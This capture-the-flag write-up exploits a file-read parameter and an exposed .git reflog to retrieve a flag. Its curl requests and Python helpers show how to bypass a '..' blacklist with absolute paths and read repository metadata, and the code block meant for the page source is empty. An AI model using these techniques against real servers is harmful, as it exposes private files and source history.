
If we visit the address, we are greeted with what looks to be the source code for the page:
```

```

If we trust that this is the actual code, then it looks like passing `file` as a query parameter might get us somewhere. In fact, this looks like an open invitation to a [directory traversal attack](https://owasp.org/www-community/attacks/Path_Traversal). Only one problem: strings containing `..` will not get us far, thanks to the `strpos()` check. Note what that check does and does not do, though. It is a blacklist for a single token, so a path that never needs `..` to leave the web root, an absolute path for instance, is not touched by it at all.
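To make that gap concrete, here is an added example (not the challenge's PHP, which is not reproduced above, and not the author's code): a Python reconstruction of a `strpos('..')`-style blacklist beside a canonicalise-and-confine check. The web root `/var/www/html` is an assumption, as are the probe paths other than the flag path used later in this writeup.

```python
import posixpath
from typing import Optional

# Assumed web root for the demonstration; the real challenge's root is not known.
WEB_ROOT = "/var/www/html"


def passes_dotdot_blacklist(user_path: str) -> bool:
    """Reconstruction of a strpos('..')-style filter: reject the request only
    when the literal token '..' appears somewhere in the user-supplied path.
    This is NOT the challenge's PHP, just the same rule expressed in Python."""
    return ".." not in user_path


def resolve_in_root(user_path: str, root: str = WEB_ROOT) -> Optional[str]:
    """Hardened variant: anchor the user path under `root`, normalise it, and
    refuse anything that does not end up inside `root`.

    posixpath.join() drops `root` entirely when `user_path` is absolute, which
    is exactly the shape that walks past a '..' blacklist; the containment
    check afterwards is what catches it. In production you would also
    canonicalise with os.path.realpath() to defeat symlinks; the lexical
    normpath() is used here so the example runs without touching the disk."""
    root = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root, user_path))
    if candidate == root or candidate.startswith(root + "/"):
        return candidate
    return None


if __name__ == "__main__":
    # Constructed probes; the absolute one is the shape used against the challenge.
    probes = [
        "index.php",
        "css/../index.php",
        "../../../etc/passwd",
        "/1a2220dd8c13c32e/flag.txt",
    ]
    for p in probes:
        print(f"{p!r:32} blacklist_ok={passes_dotdot_blacklist(p)!s:5} "
              f"confined={resolve_in_root(p)}")
```

The absolute path passes the blacklist and fails the confinement check; the `..` path fails both. The lesson is the usual one: deny-listing one token is not a path policy, the policy is "the resolved path must stay under the root".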

We also get another clue, and it turns out to matter: `Locked down with version control`. Right, so is this an exposed git repository?

```
$ curl http://challenges.ctfd.io:30595/.git/

<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>

You don't have permission to access this resource.


<hr>
<address>Apache/2.4.38 (Debian) Server at challenges.ctfd.io Port 30595</address>
</body></html>
```

So `403 Forbidden`, not `404 Not Found`: just what we wanted to see! The `.git/` directory exists, the server merely refuses to list it. Blocking the directory listing says nothing about the files inside it, so let's ask for one whose name we already know, the reflog:

```
$ curl http://challenges.ctfd.io:30595/.git/logs/HEAD
0000000000000000000000000000000000000000 862ff4b638b509e5fe354d3a93e49712f0684887 Sucks At <[email protected]> 1615233879 +0000 commit (initial): not including flag directory 1a2220dd8c13c32e in the version control system
```
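The reflog line above has a fixed shape: old hash, new hash, committer name and e-mail, Unix timestamp and timezone offset, then a tab and the message. As an added example (not from the original writeup), here is a small Python parser for that format, plus two follow-ups a practitioner wants at this point: pulling bare hex tokens out of the message, and mapping a commit hash to the loose object path one would fetch next from an exposed repository. The e-mail in the embedded sample is a placeholder, since the real one was redacted on the page; the other fields are the ones shown above.

```python
import posixpath
import re
from datetime import datetime, timezone
from typing import Dict, List

# One reflog entry per line:
#   <old-sha1> <new-sha1> <name> <email> <unix-time> <tz-offset>\t<message>
# The name may contain spaces; the message follows a tab (rendered as a space
# in the copy above) and may contain anything.
_REFLOG_RE = re.compile(
    r"^(?P<old>[0-9a-f]{40}) (?P<new>[0-9a-f]{40}) "
    r"(?P<name>.*?) <(?P<email>[^>]*)> "
    r"(?P<ts>\d+) (?P<tz>[+-]\d{4})[\t ](?P<msg>.*)$"
)

# Constructed sample: hashes, name, timestamp and message are the ones from
# .git/logs/HEAD above; the e-mail is a placeholder for the redacted original.
SAMPLE_REFLOG = (
    "0000000000000000000000000000000000000000 "
    "862ff4b638b509e5fe354d3a93e49712f0684887 "
    "Sucks At <user@example.com> 1615233879 +0000\t"
    "commit (initial): not including flag directory 1a2220dd8c13c32e "
    "in the version control system"
)


def parse_reflog(text: str) -> List[Dict[str, str]]:
    """Parse every well-formed line of a .git/logs/* file into a dict;
    malformed lines are skipped rather than raising."""
    entries = []
    for line in text.splitlines():
        m = _REFLOG_RE.match(line)
        if m:
            entries.append(m.groupdict())
    return entries


def commit_time_utc(entry: Dict[str, str]) -> str:
    """ISO-8601 UTC time of the entry. The tz field is only the committer's
    local offset; the epoch value is already UTC, so it is not applied."""
    return datetime.fromtimestamp(int(entry["ts"]), tz=timezone.utc).isoformat()


def hex_tokens(message: str, length: int = 16) -> List[str]:
    """Bare hex strings of a given length in a commit message. The word
    boundaries keep this from matching inside a longer hash."""
    return re.findall(rf"\b[0-9a-f]{{{length}}}\b", message)


def loose_object_path(sha: str) -> str:
    """Repository-relative path of the loose (zlib-compressed) object for a
    hash: first two hex chars as directory, remaining 38 as file name."""
    return posixpath.join(".git", "objects", sha[:2], sha[2:])


if __name__ == "__main__":
    for e in parse_reflog(SAMPLE_REFLOG):
        print(e["new"], commit_time_utc(e), e["name"])
        print("  message :", e["msg"])
        print("  hex dirs:", hex_tokens(e["msg"]))
        print("  object  :", loose_object_path(e["new"]))
```

Running it on the sample prints the commit hash, its UTC time, the 16-character directory name from the message, and `.git/objects/86/2ff4b6...`, which is the file you would request next if you wanted the commit object itself rather than just its log line.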

Seems the commit message has what we are after: `flag directory 1a2220dd8c13c32e`. The path has no `..` in it, so the `strpos()` check does not care. So let's try it!

```
$ curl "http://challenges.ctfd.io:30595/?file=/1a2220dd8c13c32e/flag.txt"
UDCTF{h4h4_suck3rs_i_t0tally_l0ck3d_th1s_down}
.
.
plus a bunch of HTML that is irrelevant to us right now :)
.
.
```